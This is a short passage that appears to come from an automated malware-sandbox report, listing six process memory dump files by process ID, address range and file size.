                                                                                    • memory/5796-1096-0x00000000098E0000-0x0000000009902000-memory.dmp

                                                                                      Filesize

                                                                                      136KB

                                                                                    • memory/5796-1095-0x0000000009870000-0x000000000988A000-memory.dmp

                                                                                      Filesize

                                                                                      104KB

                                                                                    • memory/5836-1115-0x000000006FB20000-0x000000006FB6B000-memory.dmp

                                                                                      Filesize

                                                                                      300KB

                                                                                    • memory/6020-1654-0x0000000008EF0000-0x0000000008F95000-memory.dmp

                                                                                      Filesize

                                                                                      660KB

                                                                                    • memory/6020-1649-0x000000006F530000-0x000000006F57B000-memory.dmp

                                                                                      Filesize

                                                                                      300KB

                                                                                    • memory/6020-1618-0x0000000007B80000-0x0000000007BCB000-memory.dmp

                                                                                      Filesize

                                                                                      300KB